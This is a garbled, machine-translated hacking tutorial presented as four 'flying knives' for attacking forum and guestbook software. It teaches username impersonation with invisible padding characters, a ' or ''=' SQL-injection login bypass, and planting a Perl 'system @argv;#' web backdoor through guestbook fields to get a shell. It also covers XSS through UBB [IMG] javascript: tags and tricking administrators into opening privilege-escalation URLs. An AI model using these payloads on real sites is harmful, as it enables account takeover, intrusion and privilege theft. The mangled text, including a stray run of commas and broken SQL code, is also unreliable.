LCX
Analyze the web program of the server, like the forum, chat room, discovers the bug or omissions written by its program, thus performing the penetration of the 80-port, seems to be just a hacker program. In fact, although we don't write programs, you can use the special character rookie to permeate the penetration invasion of the 80-port. Do not believe? Well, look at the four little Li Fei knife who carefully created with special characters.
The first flying knife: the fish is mixed. We can use it to achieve the names in the forum. Look at the one, thinking about it, thinking that she says that I love you in the whole world in the forum, what should I do? Open a notepad, press the Tab key or the CapSlock Tab button, it will form a special space. Then copy it, and place the space after the name of the crush,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, A character forming a special space also has a AAAA or AAAB or AAAC input by a location input method. There is also a character is & nbsp, which is blank in the HTML tag, which can be used. My experience is the AAAA / AAAB / AAAC entered by the location input method. The success rate in the program written in the ASP is extremely high, and the Tab key and & nbsp have a high success rate in the PHP program. More terrible is, in the WDB Forum and IBB Forum, special usernames constructed with Tab can get the same permissions as the original user. If the original user name is an administrator, the name of this padding that you construct will also become an administrator.
The second flying knife: the sea is over the sea. In ASP dynamic network programming, there is often a verification of the administrator account and password login page for background management. However, there will be some vulnerabilities in such authentication, such as input 'or' '=' in the user name and password box, or you can enter the management page. Why is this this? I simply say. See the original program: user = request.form ("user") pass = request.form ("pass") ... SQL = "SELECT * from guestbook where user = '" & user & ")" & Pass & "'If we enter' or '' '=', then the last line SQL code on the upper side will become sql =" select * from guestbook where user = 'or' '=' AND pass = '' or '' = '"If you know a little SQL statement, you can see that the' or '' = 'we entered satisfies the program's true condition value, so we will be able to pass it. It's too abstract, the confidence article management department has this vulnerability, this set of programs grab a big hand on the Internet. Take a picture, you use the special characters I offer, enter 'or' '= = 'You can manage it in the background.
The third flying knife: Dark Chen Cang. Recently, there are a lot of articles about invasive LB Forum, without an exception, they all talked about constructing special characters. As we all know, if you write system @argv in a CGI or Perl; # This line of code will form a web back door. Use http: //ip/*.pl? DIR will see the physical directory of the website (* .PL file with system @argv; # this line of code). For example, AGBII is a free CGI message, which is very popular online. And the words you stay in this message are arranged in the number of Nature, the user name, title, content, etc., and the left is discharged in a fixed directory according to the nth message order. Data / user name. It seems that it is very complicated, look at the picture. As shown in the figure, like I have left a statement, I will leave a message on this website. I use the user name; system, title is @argv; #, the content is haha, then in the Data / 222 directory 10 The contents of .pl is as shown in the figure:, carefully see the picture of the message, this message is 222. Then we execute http://192.168.1.3/book/data/222/10.pl? DIR will get a shell. The fourth flying knife: Taigong fishing. This is a method of more interesting and more difficult to use, that is, online inter-station script attack. Let me talk about how our rookie can be used. Let's talk about a fun, in the UBB code, there is a bug that we posted in the forum. In [IMG] [/ IMG] if you insert it is not an image, but a JavaScript script, it also executes. We send a post in the forum, the content is as follows: [IMG] JavaScript: Alert ("hacker x file") [/ img], when you click this post, a JS conversation will pop up, and let's book hacker X file. Write [IMG] JavaScript: Alert ("hacker x file"); self.open ("http: // URL") [/ IMG], then open a new web window after pop-up dialog box. If we put it in this web page Trojan? Here we don't talk about webpage. If we know, if this forum adds an administrator HACK URL is http: // ip / bbs / updmin? User = hack, of course, this URL is to be executed as an administrator, then we write this URL, Then attract the true administrator of this forum to see this post, then the administrator of this login forum clicks this post, Hack This ordinary registered user will become the administrator of this forum. Similar approaches, there are also upload accessories. We upload a TXT attachment, the TXT file is this URL of this plus HACK administrator. Due to the IE Bug, as long as the file in the server website file is an HTML page, it is not the same. Administrator points this TXT attachment, which can also perform the URL of the HACK administrator. As for the HTML in [img] [/ img] or txt file, the JavaSripct code we can carefully constructor, allowing the forum administrator to clicks without spot finding some URL programs.
Last description, these four flying knives are not sharp, they can seal the throat on each server, but most forums or talk rooms or other webpage programs on the Internet, or ... Words ... Xiao Li Feidao, name is not intriguing.
